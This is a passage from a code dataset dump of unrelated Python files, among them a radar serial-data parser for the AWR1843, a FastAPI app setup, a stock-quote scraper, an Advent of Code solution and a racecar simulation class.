25))\n \n for i in range(1000):\n #input.to(device)\n #target.to(device)\n # Forward pass\n outputs = model(input)\n #print(outputs, outputs.size)\n loss = criterion(outputs, target)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if i%100==0:\n print(loss)\n\ndef test_visualize_vid():\n cap = cv2.VideoCapture(\"/home2/edwin_ed520/databases/UBFC_og_14sub/S13.avi\")\n vid = []\n while cap.isOpened():\n ret, frame = cap.read()\n if ret == False: break\n vid.append(frame)\n vid = np.array(vid)\n visualize_vid(vid)\n\ndef test_datagen():\n datagenerator = DataGen(heart_rate_high=90, no_videos_by_class=2)\n x, y = datagenerator.gen_signal()\n #print(x.shape, y.shape)\n #print(x[0])\n #print(y[0])\n visualize_vid(x)\n\n#test_visualize_vid()\n#test_datagen()\ntest_model()","repo_name":"zhujiangzhijia/rppg_3dcnn","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9540563041","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 2 14:58:03 2019\n\n@author: elliott\n\"\"\"\n#This program uses a regular expression in the parser function to \n#find all of the capitalized words. It then sends those words to the \n#bayesCheck function and runs a simplified naive bayes function to \n#further prune the words most-likely to be names. \n\nimport re\n\n\ndef parser(lineNum, string):\n ans = re.findall( '[a-zA-Z]+\\w+', string)\n ans = bayesCheck(ans)\n for i in ans:\n output.write(i + \" \")\n output.write(\"\\n\")\n\ndef bayesCheck(ans):\n rating = 0\n toRemove= []\n if len(ans)>=1:\n for i in ans:\n if i[0].isupper()==True:\n rating+=1\n if len(ans)>1:\n rating+=1\n if len(i)>3:\n rating+=1\n if len(i)<9:\n rating+=1\n if rating<=3:\n toRemove.append(i)\n rating = 0\n for i in toRemove:\n ans.remove(i)\n return ans\n\ndef reader(file):\n source = open(file,\"r\")\n line = source.readlines()\n for x in range(10000):\n output.write(str(x+1) + \" \")\n parser(x, line[x])\n\nif __name__ == \"__main__\":\n output = open(\"answer.txt\", \"w+\")\n reader(\"sents_BNCbaby.txt\") \n output.close()\n output = open(\"answer.txt\", \"r\")\n if output.mode == 'r':\n contents = output.read()\n print(contents) \n \n#\n ","repo_name":"ElliottSRose/DataMining","sub_path":"lab2Bayes.py","file_name":"lab2Bayes.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6722129075","text":"def flash(i, j, ocs):\n acc = 1\n for l in range(i-1, i+2):\n for c in range(j-1, j+2):\n if not (l == i and c == j) and 0 <= l < len(ocs) and 0 <= c < len(ocs[0]):\n if ocs[l][c] != 0:\n ocs[l][c] += 1\n\n if ocs[l][c] >= 10:\n ocs[l][c] = 0\n acc += flash(l, c, ocs)\n\n return acc\n\n\ndef synchronized(ocs):\n zeros = [[o == 0 for o in oc] for oc in ocs]\n return all([all(z) for z in zeros])\n\n\nif __name__ == \"__main__\":\n ocs = []\n with open(\"11-dat.txt\") as data:\n for index, line in enumerate(data):\n ocs.append([])\n line = line.replace(\"\\n\", \"\")\n for ch in line:\n ocs[index].append(int(ch))\n\n lines = len(ocs)\n cols = len(ocs[0])\n\n acc = 0\n n = 1\n while True:\n new_ocs = ocs.copy()\n for line in range(lines):\n for col in range(cols):\n new_ocs[line][col] += 1\n\n for line in range(lines):\n for col in range(cols):\n if new_ocs[line][col] >= 10:\n new_ocs[line][col] = 0\n acc += flash(line, col, new_ocs)\n\n ocs = new_ocs\n\n if synchronized(ocs):\n break\n\n n += 1\n\n print(acc)\n print(n)\n\n\n","repo_name":"MiraiKami/AoC2021","sub_path":"11-12/11-12.py","file_name":"11-12.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14219713131","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom app.router.includes import app as router\nfrom app.settings.config import Settings\n\nconfig = Settings()\n\napp = FastAPI(\n description=config.API_DESCRIPTION,\n title=config.API_TITLE,\n version=config.API_VERSION,\n docs_url=config.API_DOC_URL,\n openapi_url=config.API_OPENAPI_URL,\n redoc_url=config.API_REDOC_URL,\n debug=config.DEBUG,\n)\n\napp.include_router(router)\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n","repo_name":"yezz123/stripe-template","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"17302466667","text":"from ..model import Quote\nfrom .base import BaseFetcher, FetchError\nfrom bs4 import BeautifulSoup\nimport requests\nimport dateutil.parser\nfrom decimal import Decimal\n\n\nclass BiznesRadar(BaseFetcher):\n @staticmethod\n def validUrl(url):\n return url.startswith(\"https://www.biznesradar.pl/\")\n\n def __init__(self, url):\n super(BiznesRadar, self).__init__(url)\n\n def fetch(self):\n html = requests.get(self.url).text\n soup = BeautifulSoup(html, 'html.parser')\n\n quoteValue = self._getQuote(soup)\n timestamp = self._getTimestamp(soup)\n name = self._getName(soup)\n ticker, alternateName = self._getTicker(soup)\n\n return Quote(quote = quoteValue, timestamp = timestamp, name = name or alternateName, currency = \"PLN\")\n\n def _getQuote(self, soup):\n quoteHtml = soup.find(id=\"pr_t_close\")\n if not quoteHtml:\n raise FetchError(self.url, \"Cannot find quote tag\")\n\n if not quoteHtml.span:\n raise BaseFetcher(self.url, \"Cannot recognize quote tag's content\")\n\n return Decimal(quoteHtml.span.string)\n\n def _getTimestamp(self, soup):\n timeHtml = soup.find(id=\"pr_t_date\")\n if not timeHtml:\n raise FetchError(self.url, \"Cannot find timestamp tag\")\n\n if not timeHtml.time:\n raise FetchError(self.url, \"Cannot recognize timestamp tag's content\")\n\n return dateutil.parser.parse(timeHtml.time['datetime'])\n\n def _getName(self, soup):\n headerHtml = soup.find(id=\"fullname-container\")\n\n if not headerHtml:\n return None\n\n if not headerHtml.h2:\n return None\n\n return str(headerHtml.h2.string)\n\n def _getTicker(self, soup):\n headerHtml = soup.find(id=\"profile-header\")\n if not headerHtml or not headerHtml.h1:\n return None, None\n\n header = str(headerHtml.h1.string)\n if header.startswith(\"Notowania \"):\n return header[10:header.find(' ', 10)], None\n else:\n return None, header\n","repo_name":"kpk-pl/wallet","sub_path":"web-gui/flaskr/quotes/fetchers/biznesradar.py","file_name":"biznesradar.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"338390551","text":"#!/usr/bin/env python\nsInputBam=\"\"\nsHSmetcisPostBam=\"\"\n\nimport gzip\nimport os, subprocess, glob, time\nimport sys, time, random, re ,requests, logging, glob\nimport concurrent.futures\nfrom multiprocessing import Process, Queue, Pool, cpu_count, current_process, Manager\n\n\nlogger=logging.getLogger()\nlogger.setLevel(logging.DEBUG)\nformatter=logging.Formatter(\"%(asctime)s - %(message)s\")\n\nch=logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n\n\n\ndef producer_task(q, cosmic_dict):\n\n\tlBamlist=glob.glob(sInputBam+\"/*.bam\")\n\tlPostrecalBam1=glob.glob(dHSmetcisPostBam+\"/AlignmentStatus_*.hs_metrics\")\n\tlPostbam=lPostrecalBam1\n\tlPostID=[]\n\t\n\t\n\tfor sPathFile in lPostbam:\n\t\tsFile=sPathFile.split(\"/\")[-1]\n\t\tsIDBam=sFile.split(\"_\")[1]\n\t\tsID=sIDBam[0:14]\n\t\tlPostID.append(sID)\n\tdTargetTCGA=dict()\n\tfFinal=open(\"/mnt/alpha/leefall2/TCGA_LUAD/mc3/allmc3Barcode.txt\")\n\tfFinal.readline()\n\t\n\t\n\t\n\tfor sLine in fFinal.readlines():\n\t\tsLine=sLine.strip()\n\t\tsTCGAID=sLine.split(\"\\t\")[0]\n\t\t#sFinal.add(t[0])\n\t\tdTargetTCGA[sTCGAID+\"-T\"]=0\n\t\tdTargetTCGA[sTCGAID+\"-N\"]=0\n\tprint(\"All_Bam\")\n\tprint(len(lBamlist))\n\t\n\tsFilelist=[]\n\n\tfor i in lBamlist:\n\t\tsFile=i.split(\"_\")[1]\n\t\tsID=sFile[0:14]\n\t\tif sID in dTargetTCGA:\n\t\t\tif sID in lPostID:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tsFilelist.append(i)\n\n\tprint(\"Non process files\")\n\n\tprint(len(sFilelist))\n\tsFinalFilelist=sFilelist\n\n\tfor i in sFinalFilelist:\n\n\t\tvalue=i\n\t\tcosmic_dict[value]=None\n\n\t\tq.put(value)\n\n\ndef consumer_task(q, cosmic_dict):\n\twhile not q.empty():\n\t\tvalue=q.get(True, 0.05)\n\t\tcosmic_dict[value]=\"complete\"\n\n\n\n\nif __name__==\"__main__\":\n\tStartTime=(time.ctime())\n\tdata_queue=Queue()\n\tos.chdir(\"/mnt/Beta/leefall2/TCGA_LUAD/postrecalBam/\")\n#\tnumber_of_cpus=cpu_count()-2\n\tnumber_of_cpus=4\n\tmanager=Manager()\n\tfibo_dict=manager.dict()\n\tproducer=Process(target=producer_task, args=(data_queue, fibo_dict))\n\tproducer.start()\n\tproducer.join()\n\tconsumer_list=[]\n\tprint(\"Number_of_Files_for_process\")\n\tprint(len(fibo_dict))\n\tfor i in range(number_of_cpus):\n\t\tconsumer=Process(target=consumer_task, args=(data_queue,fibo_dict))\n\t\tconsumer.start()\n\t\tconsumer_list.append(consumer)\n\n\t[consumer.join() for consumer in consumer_list]\n\n\n\n\n\n\n\n\n\tprint(\"Start Time\")\n\tprint(StartTime)\n\tprint(\"End Time\")\n\tprint(time.ctime())\n","repo_name":"leefall/NGS","sub_path":"QC/Run_HSmetrics_not_yet.py","file_name":"Run_HSmetrics_not_yet.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39901175404","text":"import numpy as np\n\nMAP_GAS = [-1, 500, 750, 1000, 1250, 1500]\nMAP_TIRE = [-1, 500, 750, 1000, 1250, 1500]\nMAP_HANDLING = [-1, 9, 12, 15, 18, 21]\nMAP_SPEED = [-1, 10, 20, 30, 40, 50]\nMAP_ACCEL = [-1, 10, 15, 20, 25, 30]\nMAP_DECEL = [-1, -10, -15, -20, -25, -30]\n\n\nclass car:\n def __init__(self, csv):\n parsed = np.loadtxt(open(csv, \"rb\"), dtype=int, delimiter=\",\", skiprows=1)\n self.tire = MAP_TIRE[parsed[0]]\n self.gas = MAP_GAS[parsed[1]]\n self.handling = MAP_HANDLING[parsed[2]]\n self.speed = MAP_SPEED[parsed[3]]\n self.acceleration = MAP_ACCEL[parsed[4]]\n self.breaking = MAP_DECEL[parsed[5]]\n\n self.cur_v = 0\n self.cur_gas = self.gas\n self.cur_tire = self.tire\n self.time = 0\n\n def get_state_vector(self):\n return [\n self.cur_v,\n self.cur_gas,\n self.cur_tire,\n self.time\n ]\n\n def car_reset(self):\n self.cur_v = 0\n self.cur_gas = self.gas\n self.cur_tire = self.tire\n self.time = 0\n\n def print_error(self, *args):\n pass\n\n # inst = [acc, pit_stop]\n def evolve(self, radius, inst, cur_position):\n v0 = self.cur_v\n\n if inst[0] > self.acceleration:\n self.print_error(\"ERROR: illegal acceleration value: \", inst[0], cur_position)\n return False, cur_position\n\n if inst[0] < self.breaking:\n self.print_error(\"ERROR: illegal breaking value: \", inst[0], cur_position)\n return False, cur_position\n\n if v0 <= 0 and inst[0] <= 0:\n self.print_error(\"Error: stalling at one point without moving nor acceleration. inst:\", inst, cur_position)\n return False, cur_position\n\n # resultant speed positive\n if v0 * v0 + 2 * inst[0] < 0:\n v1 = 0\n else:\n v1 = np.sqrt(v0 * v0 + 2 * inst[0])\n\n # no gas and accelerating\n if self.cur_gas <= 0 and inst[0] > 0:\n self.print_error(\"Error: no gas and accelerating\", self.cur_gas, inst[0], cur_position)\n return False, cur_position\n\n # find vmax\n if radius != -1:\n v_max = np.sqrt(radius * self.handling / 1000000)\n if v0 > v_max or v1 > v_max: # exceeds max\n self.print_error(\"Error: Speed exceeds max\", v0, v1, cur_position)\n return False, cur_position\n\n # pitstop\n if inst[1] == 1:\n # condition 1\n if v0 != 0:\n if v0 * v0 / 2 > np.abs(self.breaking):\n self.print_error(\"Error: pitstop and unable to break (too fast 1)\", cur_position)\n return False, cur_position\n t1 = 2 / v0\n else:\n t1 = 0\n\n # condition 2\n if v1 != 0:\n if v1 * v1 / 2 > self.acceleration:\n self.print_error(\"Error: pitstop and unable to read target velocity (too fast 2)\", cur_position)\n return False, cur_position\n t2 = 2 / v1\n else:\n t2 = 0\n\n # 30 (pitstop time) + t1 + t2\n self.time += 30 + t1 + t2\n\n # restore car conditions\n self.cur_gas = self.gas\n self.cur_tire = self.tire\n else:\n if inst[0] == 0:\n self.time += 1 / v0\n else:\n self.time += (v1 - v0) / inst[0]\n\n self.cur_v = v1\n\n if self.cur_v < 0:\n self.print_error(\"ERROR: negative current velocity:\", self.cur_v, cur_position)\n\n if inst[0] > 0:\n self.cur_gas -= 0.1 * inst[0] ** 2\n elif inst[0] < 0:\n self.cur_gas -= 0.1 * np.abs(inst[0]) ** 2\n\n if self.cur_tire < 0:\n self.print_error(\"Error: tire died\", cur_position)\n return False, cur_position\n\n if inst[1] == 1:\n return True, cur_position + 2\n else:\n return True, cur_position + 1\n","repo_name":"Eric-R-Liang/RL-Racecar-optimizer","sub_path":"qlearning4k/games/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37559909695","text":"\"\"\"\n================================================================================\n * @file \tawr1843.py\n * @author \tMitch Manning - s4532126\n * @date \t22-06-2021\n * @brief \tFunctions which handle communication with the AWR1843 and parsing\n * it's data.\n================================================================================\n\"\"\"\n# Standard\nfrom datetime import datetime\nimport time\nimport sys\n# Non-Standard\nimport numpy as np # 'numpy'\nimport serial as s # 'pyserial'\nfrom serial.tools import list_ports\n# Custom\nfrom jetson_gpio import * \n\n\n# Device Specific\nMAGIC_WORD = '0102030405060708'\nSDK_VERSION = '03050004'\nDEV_PLATFORM = '000A6843'\nOUTPUT_MSG_SEGMENT_LEN = 32\n# TLV Type Indicators\nDPIF_POINT_CLOUD_SPHERICAL = 6\nTARGET_LIST_3D = 7\nTARGET_INDEX = 8\nDPIF_POINT_CLOUD_SIDE_INFO = 9\n# Size of TLV Packets\nSIZE_PKT_HEADER = 52\nSIZE_TLV_HEADER = 8\nSIZE_PC_SPHERICAL = 16\nSIZE_TARGET_LIST = 112\nSIZE_TARGET_INDEX = 1\nSIZE_PC_SIDE_INFO = 4\n# IDs Associated with Error\nID_NOT_ASSOCIATED = [253, 254, 255]\n# Baud Rates\nDATA_BAUD = 921600\nCLI_BAUD = 115200\n# Chirp File Name\nCHIRP_CONF = 'chirp_file.cfg'\n# Transformation Matrices\nWORD_16 = [2**0, 2**8]\nWORD_32 = [2**0, 2**8, 2**16, 2**24]\n\n\ndef init_ports():\n \"\"\"\n @brief Opens the CLI and Data port connection with the AWR1843 device.\n @param None\n @return The port references (empty if uninitialised).\n \"\"\"\n cli_port = {}\n data_port = {}\n com_ports = list(list_ports.comports())\n \n # Linux Support\n if sys.platform.startswith('linux'):\n for port in com_ports:\n dev = port[0]\n name = port[1]\n if 'XDS110' in name and '/dev/ttyACM1' in port:\n data_port = s.Serial('/dev/ttyACM1', DATA_BAUD)\n elif 'XDS110' in name and '/dev/ttyACM0' in port:\n cli_port = s.Serial('/dev/ttyACM0', CLI_BAUD)\n\n # Windows Support\n elif sys.platform.startswith('win'):\n for port in com_ports:\n dev = port[0]\n name = port[1]\n if 'XDS110 Class Auxiliary Data Port' in name:\n data_port = s.Serial(dev, DATA_BAUD)\n elif 'XDS110 Class Application/User UART' in name:\n cli_port = s.Serial(dev, CLI_BAUD)\n\n time.sleep(0.1)\n return cli_port, data_port\n\ndef init_config(chirp_filename, cli_port):\n \"\"\"\n @brief Transmits the chirp configuration file to setup the AWR1843.\n @param chirp_filename is the name of the chirp configuration file.\n @param cli_port is the CLI port reference.\n @return None\n \"\"\"\n config_params = [line.rstrip('\\r\\n') for line in open(chirp_filename)]\n for param in config_params:\n cli_port.write((param+'\\n').encode())\n time.sleep(0.01)\n time.sleep(0.1)\n\ndef terminate(error_msg, cli_port, data_port):\n \"\"\"\n @brief Safely close COM Ports, deinits GPIO pins and terminates sensor \n operation.\n @param error_msg is the message printed to terminal.\n @param cli_port is the CLI port reference.\n @param data_port is the data port reference.\n @return None\n \"\"\"\n if cli_port:\n cli_port.write(('sensorStop\\n').encode())\n cli_port.close()\n if data_port:\n data_port.close()\n deinit_gpio()\n sys.exit(error_msg)\n\ndef restart(cli_port, data_port):\n \"\"\"\n @brief Restarts and re-initialises the AWR1843 device.\n @param cli_port is the CLI port reference.\n @param data_port is the data port reference.\n @return The port references.\n \"\"\"\n # Close connections\n if cli_port:\n cli_port.close()\n if data_port:\n data_port.close()\n \n # Restart AWR1843\n toggle_gpio()\n\n # Re-initialise the device\n cli_port, data_port = init_ports()\n if not cli_port or not data_port:\n terminate(\"[AWR1843] COM Ports are Unavailable.\", cli_port, data_port)\n init_config(CHIRP_CONF, cli_port)\n return cli_port, data_port\n\ndef data_request(cli_port, data_port):\n \"\"\"\n @brief Requests and receives a new data packet from the AWR1843.\n @param cli_port is the CLI port reference.\n @param data_port is the data port reference.\n @return The data buffer.\n \"\"\"\n # Request new data packet\n cli_port.write(('dataRequest\\n').encode())\n time.sleep(0.25)\n # Read response\n data_buf = data_port.read(data_port.in_waiting)\n return data_buf\n\ndef parse_header(data_arr, pos):\n \"\"\"\n @brief Parses the packet header.\n @param data_arr contains the data from the AWR1843.\n @param pos is the position in the current parsing position in data_arr.\n @return The formatted packet header and a new buffer pointer position.\n \"\"\"\n # Parse through the header info\n magic_num = ''\n for i in range(4):\n magic_num += format(np.matmul(data_arr[pos:pos+2], WORD_16), \\\n '04X'); pos+=2\n version = format(np.matmul(data_arr[pos:pos+4], WORD_32), \\\n '08X'); pos+=4\n platform = format(np.matmul(data_arr[pos:pos+4], WORD_32), \\\n '08X'); pos+=4\n time_stamp = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n total_pkt_len = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n frame_num = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n subframe_num = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n chirp_proc_margin = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n frame_proc_margin = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n track_proc_time = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n uart_send_time = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n num_tlv = np.matmul(data_arr[pos:pos+2], WORD_16); pos+=2\n checksum = np.matmul(data_arr[pos:pos+2], WORD_16); pos+=2\n\n # Store the data in a dictionary\n header = {'magic_num': magic_num,\n 'version': version, \n 'platform': platform, \n 'time_stamp': time_stamp, \n 'total_pkt_len': total_pkt_len, \n 'frame_num': frame_num, \n 'subframe_num': subframe_num, \n 'chirp_proc_margin': chirp_proc_margin, \n 'frame_proc_margin': frame_proc_margin, \n 'track_proc_time': track_proc_time, \n 'uart_send_time': uart_send_time, \n 'num_tlv': num_tlv,\n 'checksum': checksum\n }\n\n return header, pos\n\ndef check_header(header, data_buf):\n \"\"\"\n @brief Verifies the device specific variables and checksum.\n @param header is the parsed packet header data.\n @param data_buf is the original data buffer from the AWR1843.\n @return True if valid, false otherwise.\n \"\"\"\n # Calculate Header Checksum\n cs_arr = np.frombuffer(data_buf, dtype='uint16')[:(SIZE_PKT_HEADER//2)]\n cs_sum = np.uint32(0)\n for val in cs_arr:\n cs_sum += val\n cs_sum = (cs_sum >> 16) + (cs_sum & 0xFFFF)\n cs_sum += (cs_sum >> 16)\n calc_cs = np.uint16(~cs_sum)\n\n # Determine Validity\n if header['magic_num'] != MAGIC_WORD or \\\n header['version'] != SDK_VERSION or \\\n header['platform'] != DEV_PLATFORM or \\\n header['total_pkt_len'] != len(data_buf) or \\\n calc_cs != 0:\n return False\n else:\n return True\n\ndef parse_pc_sph_data(data_arr, tlv_len, pos):\n \"\"\"\n @brief Parses the Point Cloud Sphereical data and formats the info.\n @param data_arr contains the data from the AWR1843.\n @param tlv_len is the length specified in the TLV header.\n @param pos is the position in the current parsing position in data_arr.\n @return The formatted data and a new buffer pointer position.\n \"\"\"\n num_objs = tlv_len // SIZE_PC_SPHERICAL\n # Initialise arrays for data\n ranges = np.zeros(num_objs, dtype=np.float32)\n azimuth = np.zeros(num_objs, dtype=np.float32)\n elevation = np.zeros(num_objs, dtype=np.float32)\n doppler = np.zeros(num_objs, dtype=np.float32)\n # Parse and store data\n for obj in range(num_objs):\n ranges[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n azimuth[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n elevation[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n doppler[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n\n # Store the data in a dictionary\n pc_sph_data = {'num_objs': num_objs, \n 'ranges': ranges, \n 'azimuth': azimuth, \n 'elevation': elevation, \n 'doppler': doppler\n }\n\n return pc_sph_data, pos\n\ndef parse_target_data(data_arr, tlv_len, pos):\n \"\"\"\n @brief Parses the Target data and formats the info.\n @param data_arr contains the data from the AWR1843.\n @param tlv_len is the length specified in the TLV header.\n @param pos is the position in the current parsing position in data_arr.\n @return The formatted data and a new buffer pointer position.\n \"\"\"\n num_objs = tlv_len // SIZE_TARGET_LIST\n # Initialise arrays for data\n tid = np.zeros(num_objs, dtype=np.uint32)\n posX = np.zeros(num_objs, dtype=np.float32)\n posY = np.zeros(num_objs, dtype=np.float32)\n posZ = np.zeros(num_objs, dtype=np.float32)\n velX = np.zeros(num_objs, dtype=np.float32)\n velY = np.zeros(num_objs, dtype=np.float32)\n velZ = np.zeros(num_objs, dtype=np.float32)\n accX = np.zeros(num_objs, dtype=np.float32)\n accY = np.zeros(num_objs, dtype=np.float32)\n accZ = np.zeros(num_objs, dtype=np.float32)\n ec = np.zeros((num_objs, 16), dtype=np.float32)\n g = np.zeros(num_objs, dtype=np.float32)\n conf_lvl = np.zeros(num_objs, dtype=np.float32)\n # Parse and store data\n for obj in range(num_objs):\n tid[obj] = data_arr[pos:pos+4].view(dtype=np.uint32); pos+=4\n posX[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n posY[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n posZ[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n velX[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n velY[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n velZ[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n accX[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n accY[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n accZ[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n for i in range(len(ec[0])):\n ec[obj][i] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n g[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n conf_lvl[obj] = data_arr[pos:pos+4].view(dtype=np.float32); pos+=4\n\n # Store the data in a dictionary\n target_data = {'num_objs': num_objs, \n 'tid': tid, \n 'posX': posX, \n 'posY': posY, \n 'posZ': posZ,\n 'velX': velX, \n 'velY': velY, \n 'velZ': velZ, \n 'accX': accX, \n 'accY': accY, \n 'accZ': accZ,\n 'ec': ec, \n 'g': g, \n 'conf_lvl': conf_lvl\n }\n\n return target_data, pos\n\ndef parse_tgt_id_data(data_arr, tlv_len, pos):\n \"\"\"\n @brief Parses the Target Index data and formats the info.\n @param data_arr contains the data from the AWR1843.\n @param tlv_len is the length specified in the TLV header.\n @param pos is the position in the current parsing position in data_arr.\n @return The formatted data and a new buffer pointer position.\n \"\"\"\n num_objs = tlv_len // SIZE_TARGET_INDEX\n # Initialise arrays for data\n target_id = np.zeros(num_objs, dtype=np.uint8)\n # Parse and store data\n for obj in range(num_objs):\n target_id[obj] = data_arr[pos:pos+1].view(dtype=np.uint8); pos+=1\n\n # Store the data in a dictionary\n tgt_id_data = {'num_objs': num_objs, \n 'target_id': target_id\n }\n\n return tgt_id_data, pos\n\ndef parse_pc_sid_data(data_arr, tlv_len, pos):\n \"\"\"\n @brief Parses the Point Cloud Side Info data and formats the info.\n @param data_arr contains the data from the AWR1843.\n @param tlv_len is the length specified in the TLV header.\n @param pos is the position in the current parsing position in data_arr.\n @return The formatted data and a new buffer pointer position.\n \"\"\"\n num_objs = tlv_len // SIZE_PC_SIDE_INFO\n # Initialise arrays for data\n snr = np.zeros(num_objs, dtype=np.int16)\n noise = np.zeros(num_objs, dtype=np.int16)\n # Parse and store data\n for obj in range(num_objs):\n snr[obj] = data_arr[pos:pos+2].view(dtype=np.int16); pos+=2\n noise[obj] = data_arr[pos:pos+2].view(dtype=np.int16); pos+=2\n\n # Store the data in a dictionary\n pc_sid_data = {'num_objs': num_objs, \n 'snr': snr, \n 'noise': noise\n }\n\n return pc_sid_data, pos\n\ndef parse_pkt(data_buf):\n \"\"\"\n @brief Parse data packet into a formatted dictionary.\n @param data_buf is the original data buffer from the AWR1843.\n @return The parsed data.\n \"\"\"\n # Initialise Variables\n pos = 0\n pc_sph_data = {}\n target_data = {}\n tgt_id_data = {}\n pc_sid_data = {}\n data_arr = np.frombuffer(data_buf, dtype='uint8')\n\n # Parse Header Information\n header, pos = parse_header(data_arr, pos)\n valid_header = check_header(header, data_buf)\n if not valid_header:\n return {}\n\n # Parse Packet Contents\n for tlv_id in range(header['num_tlv']):\n tlv_type = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n tlv_len = np.matmul(data_arr[pos:pos+4], WORD_32); pos+=4\n\n if tlv_type == DPIF_POINT_CLOUD_SPHERICAL:\n pc_sph_data, pos = parse_pc_sph_data(data_arr, tlv_len, pos)\n elif tlv_type == TARGET_LIST_3D:\n target_data, pos = parse_target_data(data_arr, tlv_len, pos)\n elif tlv_type == TARGET_INDEX:\n tgt_id_data, pos = parse_tgt_id_data(data_arr, tlv_len, pos)\n elif tlv_type == DPIF_POINT_CLOUD_SIDE_INFO:\n pc_sid_data, pos = parse_pc_sid_data(data_arr, tlv_len, pos)\n else:\n break\n\n # Verify all data was parsed - consider padding bytes\n pos += OUTPUT_MSG_SEGMENT_LEN - (pos & (OUTPUT_MSG_SEGMENT_LEN-1))\n if (pos != header['total_pkt_len']):\n return {}\n\n # Time stamp data and finalise packet format\n current_time = datetime.now()\n data_pkt = {'time': current_time, \n 'header': header, \n 'pc_sph_data': pc_sph_data, \n 'target_data': target_data, \n 'tgt_id_data': tgt_id_data, \n 'pc_sid_data': pc_sid_data\n }\n\n return data_pkt\n\n\nif __name__ == '__main__':\n # Initialise the Jetson GPIO pins and restart the AWR1843\n init_gpio()\n toggle_gpio()\n\n # Initalise the CLI and Data ports with the AWR1843\n cli_port, data_port = init_ports()\n if not cli_port or not data_port:\n terminate(\"[AWR1843] COM Ports are Unavailable.\", cli_port, data_port)\n\n # Transmit the chirp configuration file\n init_config(CHIRP_CONF, cli_port)\n\n try:\n # Main Program Loop\n while True:\n # Request new data packet\n data_buf = data_request(cli_port, data_port)\n if len(data_buf) == 0:\n cli_port, data_port = restart(cli_port, data_port)\n continue\n \n # Parse data packet\n data_pkt = parse_pkt(data_buf)\n if not data_pkt:\n continue\n\n except KeyboardInterrupt:\n terminate('[AWR1843] Terminate Program.', cli_port, data_port)","repo_name":"mitchmanning/ENGG4811","sub_path":"03_dev/01_sensor_system/awr1843.py","file_name":"awr1843.py","file_ext":"py","file_size_in_byte":16006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20492688122","text":"file = open('data.txt','a')\r\n\r\n# data = \"This file is written using python script\"\r\n\r\ndata = [\r\n {'name' : 'Ram', 'age' : 16},\r\n {'name' : 'Ramesh', 'age' : 17},\r\n {'name' : 'Raman', 'age' : 15}\r\n]\r\n\r\n# file.write(str(data))\r\n\r\nfor d in data:\r\n file.write(str(d).strip('{}') + '\\n')\r\n\r\nfile.close()","repo_name":"ravi4all/PythonFeb_9-30","sub_path":"10-FileHandling/03-Append.py","file_name":"03-Append.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25648334060","text":"import sys\n\nfrom typing import List\n\nfrom clipped.formatting import Printer\n\nfrom haupt.managers.sandbox import SandboxConfigManager\nfrom haupt.settings import set_sandbox_config\nfrom polyaxon._cli.config import set_home_path\nfrom polyaxon._cli.errors import handle_cli_error\nfrom polyaxon._managers.home import HomeConfigManager\n\n\ndef show():\n \"\"\"Show the current sandbox config.\"\"\"\n _config = HomeConfigManager.get_config_or_default()\n Printer.heading(\n \"In addition to environment variables, global configs will be loaded from:\"\n )\n Printer.dict_tabulate(_config.to_dict())\n _config = SandboxConfigManager.get_config_or_default()\n Printer.heading(\"Sandbox config:\")\n Printer.dict_tabulate(_config.to_dict())\n\n\ndef get(keys: 